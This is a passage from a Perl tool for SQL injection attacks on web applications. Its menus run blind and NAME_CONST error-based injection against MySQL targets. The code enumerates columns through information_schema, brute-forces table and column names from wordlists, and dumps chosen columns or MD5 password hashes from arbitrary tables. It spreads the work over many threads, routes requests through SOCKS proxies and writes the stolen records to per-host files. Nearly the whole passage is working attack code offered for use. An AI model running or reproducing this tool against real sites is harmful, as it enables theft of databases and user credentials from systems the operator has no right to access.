  2870.              return $str;
  2871.     }
  2872.     open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  2873.     print "-----------------------------------------\n";
  2874.     print "Enter the table_name: ";
  2875.     $choice = <STDIN>;
  2876.     chomp $choice;
  2877.     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  2878.     print "Table: $choice\n";
  2879.     print "----------\n";
  2880.     print FILE1  "-----------------------------------------\n";
  2881.     print FILE1  "Table [ $choice ]\n";
  2882.     print FILE1  "-----------------------------------------\n";
  2883.     COLUMNS:
  2884.     $table_name = $choice;
  2885.     $table_name1 = ascii_to_hex $table_name;
  2886.     # ?????? ???-?? ??????? ? ??????? #
  2887.     print "-----------------------------------\n";
  2888.     ## ???????? ##
  2889.     $bl_lenght = "";
  2890.     $ii = 0;
  2891.     $bl_column_number = "";
  2892.     $bl_current = "(select" . $bl_plus .  "count(column_name)" . $bl_plus . "from" . $bl_plus . "information_schema.columns" . $bl_plus . "where" . $bl_plus . "table_name=" . $table_name1 . ")";
  2893.             if ($bl_mode==0) {
  2894.                    $bl_lenght = len_check();
  2895.             } else {
  2896.                    $bl_lenght = len_check1();
  2897.             }
  2898.     if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2899.         print "Count columns from $table_name [length]:" .  $bl_lenght . "\n";
  2900.         ############################################################
  2901.         for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2902.                if ($bl_mode==0) {
  2903.                    $bl_column_number .= get_res_count();
  2904.                } else {
  2905.                    $bl_column_number .= get_res_count1();
  2906.                }
  2907.                 print $bl_column_number . "\r";
  2908.                 sleep $pause;
  2909.         }
  2910.         print "\n------------------------------------------------------\n";
  2911.         print "Count columns from $table_name [value]:" . $bl_column_number . "\n";
  2912.         print "--------------------------------------------------------\n";
  2913.         if ($bl_column_number <=10 ) {
  2914.               print "Fast MODE - records <= 10\n";
  2915.         } else {
  2916.               print "Normal MODE - records > 10\n";
  2917.         }
  2918.         print "--------------------------------------------------------\n";
  2919.         print FILE1 "Count columns from $table_name:" . $bl_column_number . "\n";
  2920.      } else {
  2921.         print "\n------------------------------------------------------\n";
  2922.         print "Cant't get data...\n";
  2923.         print "------------------------------------------------------\n";
  2924.      }
  2925.      $mflag = 0;
  2926.      print "-----------------------------------\n";
  2927.      $time = localtime;
  2928.      print $time . "\n";
  2929.      print "-----------------------------------\n";
  2930.     ## ?????? ??????? ##
  2931.     print "Request method - $method\n";
  2932.     print "Threads - $kol_threads\n";
  2933.     print "Proxy - $proxy_message\n";
  2934.     print "----------------------\n";
  2935.     # ?????? ??????? #
  2936.     print "----------------------------------------------\n";
  2937.     $thr = $kol_threads; # ???-?? ???????
  2938.     $num = -1; # ?? ????????
  2939.     $bl_lenght = "";
  2940.     $ii = 0;
  2941.     $s = 0;
  2942.     print "Get columns from $table_name:\n";
  2943.     print "-------------------------------------------------------------\n";
  2944.     for(0..$thr) {
  2945.        $trl[$_] = threads->create(\&gets103);
  2946.     }
  2947.     for(0..$thr) {
  2948.        $trl[$_]->join;
  2949.     }
  2950.     $time = localtime;
  2951.     print $time . "\n";
  2952.     sub gets103 {
  2953.         $| = 1;
  2954.         while ($num < $bl_column_number) {
  2955.             { lock($num);
  2956.             $num++; }
  2957.             $sss = $num;
  2958.             $bl_current = "(select" . $bl_plus .  "column_name" . $bl_plus . "from" . $bl_plus . "information_schema.columns" . $bl_plus . "where" . $bl_plus . "table_name=" . $table_name1 . $bl_plus . "limit" . $bl_plus . $num . ",1)";
  2959.             if ($bl_mode==0) {
  2960.                    $bl_lenght = len_check();
  2961.             } else {
  2962.                    $bl_lenght = len_check1();
  2963.             }
  2964.             if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  2965.                  print "\ncolumn limit $sss,1 [length]:" .  $bl_lenght . "\n";
  2966.                  if ($mflag == 1) {
  2967.                      ############################################################
  2968.                      %aa = ();
  2969.                      $aa = gets1000();
  2970.                      $data1 = "";
  2971.                      $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  2972.                      #############################################################
  2973.                  } else {
  2974.                    $data1 = "";
  2975.                    for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  2976.                     if ($bl_mode==0) {
  2977.                          $data1 .= chr(get_res_normal());
  2978.                     } else {
  2979.                          $data1 .= chr(get_res_normal1());
  2980.                     }
  2981.                       print $data1 . "\r";
  2982.                    }
  2983.                  }
  2984.                  print "\n-----------------------------------\n";
  2985.                  print "  ---> column limit $sss,1: " . $data1 . "\n";
  2986.                  print "-----------------------------------\n";
  2987.                  print FILE1 "  ---> column limit $sss,1: " . $data1 . "\n";
  2988.                  $data = "";
  2989.             }
  2990.             sleep $pause;
  2991.         }
  2992.     }
  2993.     print FILE1 "----------\n";
  2994.     print "----------\n";
  2995.     print "Saved in " . "z_" . $host3 . ".txt\n";
  2996.     close(FILE1);
  2997.     goto START10;
  2998. }
  2999. if ($choice==10) {
  3000.     $schema_flag = 0;
  3001.     sub ascii_to_hex ($) {
  3002.                (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  3003.                $str = "0x" . $str;
  3004.              return $str;
  3005.     }
  3006.     open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  3007.     print "-----------------------------------------\n";
  3008.     print "Enter the table_name: ";
  3009.     $choice = <STDIN>;
  3010.     chomp $choice;
  3011.     if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  3012.     $table_name = $choice;
  3013.     $table_name1 = ascii_to_hex $table_name;
  3014.     print "-----------------------------------------\n";
  3015.     print "MySQL>=5 or MySql<5? (1/0): ";
  3016.     $choice = <STDIN>;
  3017.     chomp $choice;
  3018.     if ($choice == 1) {
  3019.          BL_TABLE_SCHEMA:
  3020.          $schema_flag = 1;
  3021.          print "-----------------------------------------------------\n";
  3022.          print "Getting table_schema for $table_name, wait please... \n";
  3023.          print "-----------------------------------------------------\n";
  3024.          $bl_lenght = "";
  3025.          $bl_table_schema = "";
  3026.          $ii = 0;
  3027.          $bl_current = "(select" . $bl_plus .  "table_schema" . $bl_plus . "from" . $bl_plus . "information_schema.tables" . $bl_plus . "where" . $bl_plus . "table_name=" . $table_name1 . ")";
  3028.             if ($bl_mode==0) {
  3029.                    $bl_lenght = len_check();
  3030.             } else {
  3031.                    $bl_lenght = len_check1();
  3032.             }
  3033.          if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  3034.               print "Table_schema for table user [length]:" .  $bl_lenght . "\n";
  3035.               ############################################################
  3036.               %aa = ();
  3037.               $aa = gets1005();
  3038.               $data1 = "";
  3039.               $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  3040.               #############################################################
  3041.               $bl_table_schema = $data1;
  3042.               if ($bl_table_schema =~ m/-/imgs) {$bl_table_schema = "`" . $choice . "`"}
  3043.               $schema_flag = 0;
  3044.               print "\n------------------------------------------------------\n";
  3045.               print "Table_schema for table user [value]:" . $bl_table_schema . "\n";
  3046.          } else {
  3047.               print "\n------------------------------------------------------\n";
  3048.               print "Cant't get data...\n";
  3049.               print "------------------------------------------------------\n";
  3050.          }
  3051.          $table_name = $bl_table_schema . "." . $table_name;
  3052.     }
  3053.     print "-----------------------------------------\n";
  3054.     print "Table: $table_name\n";
  3055.     print "-----------------------------------------\n";
  3056.     ##############################################################################################################
  3057.     print "Enter the column(s) name(s) - for example - id or id,username,user_password:\n";
  3058.     $choice = <STDIN>;
  3059.     chomp $choice;
  3060.     $column_name = $choice;
  3061.     print FILE1  "-----------------------------------------\n";
  3062.     print FILE1  "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
  3063.     print FILE1  "-----------------------------------------\n";
  3064.     print "Dump column(s): [ " . $column_name . " ] from [ " .$table_name . " ]\n";
  3065.     print "-----------------------------------------\n";
  3066.     print "Do you want add condition to sql-query?\n";
  3067.     print "----------\n";
  3068.     print "for example - where id=1 ? (1/0): ";
  3069.     $choice11 = <STDIN>;
  3070.     chomp $choice11;
  3071.     $condition=0;
  3072.     if ($choice11==1) {
  3073.         print "-----------------------------------------\n";
  3074.         print "Enter your condition here - only one condition, without 'where', '+' and quotes, example - id=1 :\n";
  3075.         print "----------\n";
  3076.         $choice11 = <STDIN>;
  3077.         chomp $choice11;
  3078.         $where = $choice11;
  3079.         print "Your condition: [ where $where ]\n";
  3080.         $condition=1;
  3081.     } else {
  3082.         $condition=0;
  3083.     }
  3084.     if ($condition==0) {
  3085.          $turbo_flag = 0;
  3086.          # ?????? ???-?? ?????? ??????? #
  3087.          print "-----------------------------------\n";
  3088.          print "Count data from [ $table_name  ]:\n";
  3089.          # ?????? ???-?? ?????? ??????? #
  3090.          print "-----------------------------------\n";
  3091.          ## ???????? ##
  3092.          $bl_lenght = "";
  3093.          $ii = 0;
  3094.          $bl_column_number_DATA = "";
  3095.          $bl_current = "(select" . $bl_plus .  "count(*)" . $bl_plus . "from" . $bl_plus . $table_name . ")";
  3096.             if ($bl_mode==0) {
  3097.                    $bl_lenght = len_check();
  3098.             } else {
  3099.                    $bl_lenght = len_check1();
  3100.             }
  3101.          if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  3102.                 print "Count ALL DATA from " . $table_name .  "[length]:" .  $bl_lenght . "\n";
  3103.                 for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  3104.                    if ($bl_mode==0) {
  3105.                       $bl_column_number_DATA .= get_res_count();
  3106.                    } else {
  3107.                       $bl_column_number_DATA .= get_res_count1();
  3108.                    }
  3109.                    print $bl_column_number_DATA . "\r";
  3110.                    sleep $pause;
  3111.                 }
  3112.                 print "\n------------------------------------------------------\n";
  3113.                 print "Count ALL DATA from " . $table_name . " [value]:" . $bl_column_number_DATA . "\n";
  3114.                 print "--------------------------------------------------------\n";
  3115.                 print "Normal MODE - records > 10\n";
  3116.                 print "Fast MODE - records <= 10\n";
  3117.                 print "TURBO-MODE - 1 record, 1 column\n";
  3118.                 print "MD5-TURBO-MODE - 1 record, 1 column, MD5-hash\n";
  3119.                 print "-----------------------------------------\n";
  3120.         } else {
  3121.                 print "Cant't get data...\n";
  3122.         }
  3123.         $mflag = 0;
  3124.         print "-----------------------------------\n";
  3125.         $time = localtime;
  3126.         print $time . "\n";
  3127.         print "-----------------------------------\n";
  3128.          ## start from2 ##
  3129.          print "Get ALL data from " . $table_name . " (" . $bl_column_number_DATA . ") ? (1/0): ";
  3130.          $choice = <STDIN>;
  3131.          chomp $choice;
  3132.          $thr = $kol_threads; # ???-?? ???????
  3133.          if ($choice == 1) {
  3134.               $num = -1; # ?? ????????
  3135.          } else {
  3136.               print "Enter START_position: ";
  3137.               $choice1 = <STDIN>;
  3138.               chomp $choice1;
  3139.               $num = $choice1-1;
  3140.               print "Enter END_position: ";
  3141.               $choice2 = <STDIN>;
  3142.               chomp $choice2;
  3143.               $bl_column_number_DATA = $choice2-1;
  3144.               print "Dump records from [" . ($num+2) . "] to [" . ($bl_column_number_DATA+1) . "]\n";
  3145.               $rec_number = ($bl_column_number_DATA+1) - ($num+2);
  3146.               if ($rec_number == 0) {
  3147.                  print "\n---------------------------------------------------------------\n";
  3148.                  print "Dump just one record, switching to TURBO-MODE....check\n";
  3149.                  ($x,$y) = split (/,/,$column_name);
  3150.                  if ($y) {
  3151.                       "\n---------------------------------------------------------------\n";
  3152.                       print "Sorry, just one column for TURBO-MODE\n";
  3153.                       "---------------------------------------------------------------\n";
  3154.                       $turbo_flag = 0;
  3155.                  } else {
  3156.                       print "\n---------------------------------------------------------------\n";
  3157.                       print "Detecting just one column & one record - is it MD5-HASH? (1/0): ";
  3158.                       $choice_t = <STDIN>;
  3159.                       chomp $choice_t;
  3160.                       if ($choice_t == 1) {
  3161.                              $turbo_flag = 2;
  3162.                              print "=======================================================\n";
  3163.                              print "MD5-TURBO-MODE GRANTED\n";
  3164.                              print "=======================================================\n";
  3165.                       } else {
  3166.                              $turbo_flag = 1;
  3167.                              print "=======================================================\n";
  3168.                              print "TURBO-MODE GRANTED\n";
  3169.                              print "=======================================================\n";
  3170.                       }
  3171.                  }
  3172.  
  3173.               }
  3174.          }
  3175.          print "-----------------------------------------\n";
  3176.          print "Request method - $method\n";
  3177.          print "Threads - $kol_threads\n";
  3178.          print "Proxy - $proxy_message\n";
  3179.          print "----------------------\n";
  3180.          ## end from2
  3181.          # ?????? ?????? ?? ??????? #
  3182.          $bl_lenght = "";
  3183.          $ii = 0;
  3184.          $s = 0;
  3185.          print "Get columns [$column_name] from [$table_name]:\n";
  3186.          print "------------------------\n";
  3187.          for(0..$thr) {
  3188.             $trl[$_] = threads->create(\&gets104);
  3189.          }
  3190.          for(0..$thr) {
  3191.             $trl[$_]->join;
  3192.          }
  3193.          $time = localtime;
  3194.          print $time . "\n";
  3195.          print "----------------------\n";
  3196.          sub gets104 {
  3197.                 $| = 1;
  3198.                 while ($num < $bl_column_number_DATA) {
  3199.                 { lock($num);
  3200.                 $num++; }
  3201.                 $sss = $num;
  3202.                 $bl_current = "(select" . $bl_plus .  "concat_ws(0x3a," . $column_name . ")" . $bl_plus . "from" . $bl_plus . $table_name . $bl_plus . "limit" . $bl_plus . $num . ",1)";
  3203.                 if ($turbo_flag == 2) {
  3204.                     $bl_lenght = 32;
  3205.                 } else {
  3206.                      if ($bl_mode==0) {
  3207.                          $bl_lenght = len_check();
  3208.                      } else {
  3209.                          $bl_lenght = len_check1();
  3210.                      }
  3211.                 }
  3212.                 if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  3213.                       print "\nRecord limit $sss,1 [length]:" .  $bl_lenght . "\n";
  3214.                       if ($mflag == 1) {
  3215.                           ############################################################
  3216.                           %aa = ();
  3217.                           if ($turbo_flag == 0) {$aa = gets1000();}
  3218.                           if ($turbo_flag == 1) {$aa = TURBO();}
  3219.                           if ($turbo_flag == 2) {$aa = md5();}
  3220.                           $data1 = "";
  3221.                           $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  3222.                           #############################################################
  3223.                       } else {
  3224.                           $data1 = "";
  3225.                           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  3226.                              if ($bl_mode==0) {
  3227.                                 $data1 .= chr(get_res_normal());
  3228.                              } else {
  3229.                                 $data1 .= chr(get_res_normal1());
  3230.                              }
  3231.                               print $data1 . "\r";
  3232.                           }
  3233.                       }
  3234.                       print "\n-----------------------------------\n";
  3235.                       print "  ---> Record limit $sss,1: " . $data1 . "\n";
  3236.                       print "-----------------------------------\n";
  3237.                       print FILE1 "  ---> Record limit $sss,1: " . $data1 . "\n";
  3238.                 }
  3239.                 sleep $pause;
  3240.                 }
  3241.          }
  3242.          print "----------\n";
  3243.          print "Saved in " . "z_" . $host3 . ".txt\n";
  3244.          close(FILE1);
  3245.          goto START10;
  3246.     } else {
  3247.     ## ?????? ?????? ?? ??????? ##
  3248.          $turbo_flag = 0;
  3249.          print "Count data from [ $table_name  ] with [ where " . $where . " ] \n";
  3250.          # ?????? ???-?? ?????? ??????? #
  3251.          print "-----------------------------------\n";
  3252.          ## ???????? ##
  3253.          $bl_lenght = "";
  3254.          $ii = 0;
  3255.          $bl_column_number_DATA = "";
  3256.  
  3257.          $bl_current = "(select" . $bl_plus .  "count(*)" . $bl_plus . "from" . $bl_plus . $table_name . $bl_plus . "where" . $bl_plus . $where . ")";
  3258.             if ($bl_mode==0) {
  3259.                    $bl_lenght = len_check();
  3260.             } else {
  3261.                    $bl_lenght = len_check1();
  3262.             }
  3263.          if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  3264.                 print "Count ALL DATA from " . $table_name .  "[length]:" .  $bl_lenght . "\n";
  3265.                 for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  3266.                    if ($bl_mode==0) {
  3267.                       $bl_column_number_DATA .= get_res_count();
  3268.                    } else {
  3269.                       $bl_column_number_DATA .= get_res_count1();
  3270.                    }
  3271.                    print $bl_column_number_DATA . "\r";
  3272.                    sleep $pause;
  3273.                 }
  3274.                 print "\n------------------------------------------------------\n";
  3275.                 print "Count ALL DATA from " . $table_name . " [value]:" . $bl_column_number_DATA . "\n";
  3276.                 print "--------------------------------------------------------\n";
  3277.                 print "Normal MODE - records > 10\n";
  3278.                 print "Fast MODE - records <= 10\n";
  3279.                 print "TURBO-MODE - 1 record, 1 column\n";
  3280.                 print "MD5-TURBO-MODE - 1 record, 1 column, MD5-hash\n";
  3281.                 print "-----------------------------------------\n";
  3282.         } else {
  3283.                 print "\n------------------------------------------------------\n";
  3284.                 print "Cant't get data...\n";
  3285.                 print "------------------------------------------------------\n";
  3286.         }
  3287.         print "-----------------------------------\n";
  3288.         $mflag = 0;
  3289.         $time = localtime;
  3290.         print $time . "\n";
  3291.         print "-----------------------------------\n";
  3292.          ## start from2 ##
  3293.          print "Get ALL data from " . $table_name . " (" . $bl_column_number_DATA . ") ? (1/0): ";
  3294.          $choice = <STDIN>;
  3295.          chomp $choice;
  3296.          $thr = $kol_threads; # ???-?? ???????
  3297.          if ($choice == 1) {
  3298.               $num = -1; # ?? ????????
  3299.          } else {
  3300.               print "Enter START_position: ";
  3301.               $choice1 = <STDIN>;
  3302.               chomp $choice1;
  3303.               $num = $choice1-1;
  3304.               print "Enter END_position: ";
  3305.               $choice2 = <STDIN>;
  3306.               chomp $choice2;
  3307.               $bl_column_number_DATA = $choice2-1;
  3308.               print "Dump records from [" . ($num+2) . "] to [" . ($bl_column_number_DATA+1) . "]\n";
  3309.               $rec_number = ($bl_column_number_DATA+1) - ($num+2);
  3310.               if ($rec_number == 0) {
  3311.                  print "\n---------------------------------------------------------------\n";
  3312.                  print "Dump just one record, switching to TURBO-MODE....check\n";
  3313.                  ($x,$y) = split (/,/,$column_name);
  3314.                  if ($y) {
  3315.                       "\n---------------------------------------------------------------\n";
  3316.                       print "Sorry, just one column for TURBO-MODE\n";
  3317.                       "---------------------------------------------------------------\n";
  3318.                       $turbo_flag = 0;
  3319.                  } else {
  3320.                       print "\n---------------------------------------------------------------\n";
  3321.                       print "Detecting just one column & one record - is it MD5-HASH? (1/0): ";
  3322.                       $choice_t = <STDIN>;
  3323.                       chomp $choice_t;
  3324.                       if ($choice_t == 1) {
  3325.                              $turbo_flag = 2;
  3326.                              print "=======================================================\n";
  3327.                              print "MD5-TURBO-MODE GRANTED\n";
  3328.                              print "=======================================================\n";
  3329.                       } else {
  3330.                              $turbo_flag = 1;
  3331.                              print "=======================================================\n";
  3332.                              print "TURBO-MODE GRANTED\n";
  3333.                              print "=======================================================\n";
  3334.                       }
  3335.                  }
  3336.  
  3337.               }
  3338.          }
  3339.          print "-----------------------------------------\n";
  3340.          print "Request method - $method\n";
  3341.          print "Threads - $kol_threads\n";
  3342.          print "Proxy - $proxy_message\n";
  3343.          print "----------------------\n";
  3344.          ## end from2
  3345.          # ?????? ?????? ?? ??????? #
  3346.          $bl_lenght = "";
  3347.          $ii = 0;
  3348.          $s = 0;
  3349.          print "Get columns from $table_name:\n";
  3350.          print "------------------------\n";
  3351.          for(0..$thr) {
  3352.             $trl[$_] = threads->create(\&gets105);
  3353.          }
  3354.          for(0..$thr) {
  3355.             $trl[$_]->join;
  3356.          }
  3357.          $time = localtime;
  3358.          print $time . "\n";
  3359.          print "----------------------\n";
  3360.          sub gets105 {
  3361.                 $| = 1;
  3362.                 while ($num < $bl_column_number_DATA) {
  3363.                 { lock($num);
  3364.                 $num++; }
  3365.                 $sss = $num;
  3366.                 $bl_current = "(select" . $bl_plus .  "concat_ws(0x3a," . $column_name . ")" . $bl_plus . "from" . $bl_plus . $table_name . $bl_plus . "where" . $bl_plus . $where . $bl_plus . "limit" . $bl_plus . $num . ",1)";
  3367.                 if ($turbo_flag == 2) {
  3368.                     $bl_lenght = 32;
  3369.                 } else {
  3370.                     if ($bl_mode==0) {
  3371.                        $bl_lenght = len_check();
  3372.                     } else {
  3373.                        $bl_lenght = len_check1();
  3374.                     }  
  3375.                 }
  3376.                 if  (($bl_lenght >= 1) && ($bl_lenght < 1000)) {
  3377.                       print "\nRecord limit $sss,1 [length]:" .  $bl_lenght . "\n";
  3378.                       if ($mflag == 1) {
  3379.                           ############################################################
  3380.                           %aa = ();
  3381.                           if ($turbo_flag == 0) {$aa = gets1000();}
  3382.                           if ($turbo_flag == 1) {$aa = TURBO();}
  3383.                           if ($turbo_flag == 2) {$aa = md5();}
  3384.                           $data1 = "";
  3385.                           $data1 .= $aa->{$_},for sort {$a <=> $b} keys %$aa;
  3386.                           #############################################################
  3387.                       } else {
  3388.                           $data1 = "";
  3389.                           for ($ii = 1; $ii <= $bl_lenght; $ii++) {
  3390.                              if ($bl_mode==0) {
  3391.                                 $data1 .= chr(get_res_normal());
  3392.                              } else {
  3393.                                 $data1 .= chr(get_res_normal1());
  3394.                              }
  3395.                               print $data1 . "\r";
  3396.                           }
  3397.                       }
  3398.                       print "\n-----------------------------------\n";
  3399.                       print "  ---> Record limit $sss,1: " . $data1 . "\n";
  3400.                       print "-----------------------------------\n";
  3401.                       print FILE1 "  ---> Record limit $sss,1: " . $data1. "\n";
  3402.                 }
  3403.                 sleep $pause;
  3404.                 }
  3405.          }
  3406.          print "----------\n";
  3407.          print "Saved in " . "z_" . $host3 . ".txt\n";
  3408.          close(FILE1);
  3409.          goto START10;
  3410.     }
  3411. }
  3412. if ($choice==11) {
  3413.    START11:
  3414.    print "    [1] Brute table\n";
  3415.    print "    [2] Brute column\n";
  3416.    print "    [3] Main menu\n";
  3417.    print "----------\n";
  3418.    $choice = <STDIN>;
  3419.    chomp $choice;
  3420.    print "Your choice: $choice\n";
  3421.    print "-------------\n";
  3422.    if ($choice == 1) {
  3423.        open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  3424.        print "   Brute tables\n";
  3425.        print "   -------------\n";
  3426.        print FILE1 "   Brute tables\n";
  3427.        print FILE1 "   -------------\n";
  3428.        open(FILE, "<", $source_table_list);
  3429.        while(<FILE>) {
  3430.          chomp;
  3431.          push(@tables4, $_);
  3432.        }
  3433.        close(FILE);
  3434.        print "Add prefix for brute tables ? ( for example - PHPBB_ ) (1/0): ";
  3435.        $choice = <STDIN>;
  3436.        chomp $choice;
  3437.        if ($choice == 1) {
  3438.               print "Enter your prefix for brute tables: ";
  3439.               $choice = <STDIN>;
  3440.               chomp $choice;
  3441.               $pref_brute = $choice;
  3442.        } else {
  3443.               $pref_brute = "";
  3444.        }
  3445.        $size = 0;
  3446.        $size = @tables4;
  3447.        print "File: $source_table_list\n";
  3448.        print "Tables: $size\n";
  3449.        print "-------------\n";
  3450.        print "Request method - $method\n";
  3451.        print "Threads - $kol_threads\n";
  3452.        print "Proxy - $proxy_message\n";
  3453.        print "----------------------\n";
  3454.        $thr = $kol_threads; # ???-?? ???????
  3455.        $num = -1; # ?? ????????
  3456.        for(0..$thr) {
  3457.             $trl[$_] = threads->create(\&gets106);
  3458.        }
  3459.        for(0..$thr) {
  3460.             $trl[$_]->join;
  3461.        }
  3462.        sub gets106 {
  3463.             $| = 1;
  3464.             while ($num<$size) {
  3465.                { lock($num);
  3466.                $num++; }
  3467.                $chek_len20 = 0;
  3468.                $current1 = $pref_brute . $tables4[$num];
  3469.                $bl_query = $bl_url . $bl_plus . "and" . $bl_plus . "(select" . $bl_plus . "1" . $bl_plus . "from" . $bl_plus . $current1 . $bl_plus . "limit" . $bl_plus . "0,1)=1" . $bl_filtr;
  3470.                $chek_len20 = wr_check();
  3471.                if($chek_len20 == 1) {
  3472.                     print "   ---> " . $current1 . "\n";
  3473.                     print FILE1 "  "  . $current1 . "\n";
  3474.                }
  3475.                print $num . "\r";
  3476.                sleep $pause;
  3477.  
  3478.             }
  3479.        }
  3480.        print "----------\n";
  3481.        print "Saved in " . "z_" . $host3 . ".txt\n";
  3482.        close(FILE1);
  3483.        goto START11;
  3484.    }
  3485.    if ($choice == 2) {
  3486.          open( FILE1, ">>" . "z_" .$host3 . ".txt" ); # ???? ??? ?????? ???????????
  3487.          print "   Brute columns\n";
  3488.          print "   -------------\n";
  3489.          print FILE1 "   Brute columns\n";
  3490.          print FILE1 "   -------------\n";
  3491.          print "Enter the table_name for brute: \n";
  3492.          $choice = <STDIN>;
  3493.          chomp $choice;
  3494.          $table = $choice;
  3495.          print "Brute columns for table [ " . $table . " ]\n";
  3496.          print "-------------\n";
  3497.          open(FILE, "<", $source_column_list);
  3498.          while(<FILE>) {
  3499.             chomp;
  3500.             push(@columns4, $_);
  3501.          }
  3502.          close(FILE);
  3503.        print "Add prefix for brute columns? ( for example - PHPBB_ ) (1/0): ";
  3504.        $choice = <STDIN>;
  3505.        chomp $choice;
  3506.        if ($choice == 1) {
  3507.               print "Enter your prefix for brute columns: ";
  3508.               $choice = <STDIN>;
  3509.               chomp $choice;
  3510.               $pref_brute = $choice;
  3511.        } else {
  3512.               $pref_brute = "";
  3513.        }
  3514.          $size = 0;
  3515.          $size = @columns4;
  3516.          print "-------------\n";
  3517.          print "File: $source_column_list\n";
  3518.          print "Columns: $size\n";
  3519.          print "-------------\n";
  3520.          print "Request method - $method\n";
  3521.          print "Threads - $kol_threads\n";
  3522.          print "Proxy - $proxy_message\n";
  3523.          print "----------------------\n";
  3524.          $thr = $kol_threads; # ???-?? ???????
  3525.        $num = -1; # ?? ????????
  3526.        for(0..$thr) {
  3527.             $trl[$_] = threads->create(\&gets107);
  3528.        }
  3529.        for(0..$thr) {
  3530.             $trl[$_]->join;
  3531.        }
  3532.        sub gets107 {
  3533.             $| = 1;
  3534.             while ($num<$size) {
  3535.                { lock($num);
  3536.                $num++; }
  3537.                $chek_len20 = 0;
  3538.                $current1 = $pref_brute . $columns4[$num];
  3539.                $bl_query = $bl_url . $bl_plus . "and" . $bl_plus . "(select" . $bl_plus . "mid(concat(1," . $current1 . "),1,1)" . $bl_plus . "from" . $bl_plus . $table . $bl_plus . "limit" . $bl_plus .  "0,1)=1" . $bl_filtr;
  3540.                $chek_len20 = wr_check();
  3541.                if($chek_len20 == 1) {
  3542.                     print "   ---> " . $current1 . "\n";
  3543.                     print FILE1 "  "  . $current1 . "\n";
  3544.                }
  3545.                print $num . "\r";
  3546.                sleep $pause;
  3547.  
  3548.             }
  3549.        }
  3550.        print "----------\n";
  3551.        print "Saved in " . "z_" . $host3 . ".txt\n";
  3552.        close(FILE1);
  3553.        goto START11;
  3554.    }
  3555.    if ($choice == 3) {
  3556.        goto START10;
  3557.    }
  3558. }
  3559. if ($choice == 12) {
  3560.   goto START;
  3561. }
  3562. }# end blind
  3563. ## mysql name_const ##
  3564. if ($choice == 11) {
  3565. if ($nc_url =~ m/^https:\/\/?([^\/]+)/i) {
  3566.    $host6 = $1;
  3567.    $https_flag = 1;
  3568.    print "----------------------\n";
  3569.    print "HTTPS mode enabled\n";
  3570.    print "----------------------\n";
  3571. }
  3572. $host = $host6;
  3573. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  3574.     print "-----------------------------------------\n";
  3575.     print "Authorization required, wait please....";
  3576.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  3577.     $ck1 = collect($answ1);
  3578.     $https_auth_check = 1;
  3579.     print " DONE\n";
  3580.     print "-----------------------------------------\n";
  3581. }
  3582. if ($use_socks == 1 && $socks_check == 0) {
  3583.   $check_url = $host;
  3584.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  3585.            . "Host: $check_host\r\n"
  3586.            . "Referer: http://" . $check_url . "\r\n"
  3587.            . "Accept: */*\r\n"
  3588.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  3589.            . "Connection: close\r\n\r\n";
  3590.    print "----------------------------------------\n";
  3591.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  3592.    print "Timeout = 5 sec:\n";
  3593.    print "----------------------------------------\n";
  3594.    $socks_check = 0;
  3595.    $check_socks = socks_check();
  3596.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  3597.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  3598.   if ($current_proxy_host) {
  3599.      $socks_check = 1;
  3600.      print "Will use --> $proxy_message\n";
  3601.   } else {
  3602.      $socks_check = 0;
  3603.      $proxy_message = "No";
  3604.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  3605.   }
  3606. }
  3607. START200:
  3608. print "-----------------------------------------\n";
  3609. print "               Choose mode:\n";
  3610. print "-----------------------------------------\n";
  3611. print "    [1]  NAME_CONST - Mysql inj system information\n";
  3612. print "    [2]  NAME_CONST - get DB-names from information_schema.schemata\n";
  3613. print "    [3]  NAME_CONST - get tables from DB-name\n";
  3614. print "    [4]  NAME_CONST - get column_name from tables from DB-name\n";
  3615. print "    [5]  NAME_CONST - Mysql inj get tables from information_schema (current DB)\n";
  3616. print "    [6]  NAME_CONST - Mysql inj get column_name from table (current DB)\n";
  3617. print "    [7]  NAME_CONST - Mysql inj get data from columns\n";
  3618. print "-----------------------------------------\n";
  3619. print "    [8]  Main menu\n";
  3620. print "-----------------------------------------\n";
  3621. $choice = <STDIN>;
  3622. chomp $choice;
  3623. print "Your choice: $choice\n";
  3624. if ($choice==1) {
  3625.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
  3626.      #### ?????? ?????? #####################################################
  3627.      $temp = $sql_pref1 . "concat(0x7665723a,version())" . $sql_pref2;
  3628.      $nc_start1 = $nc_start . $temp;
  3629.      $nc_midle1 = $nc_midle . $temp;
  3630.      $url1 = $nc_start1 . $nc_midle1 . $nc_end;
  3631.      $nc_start1 = "";
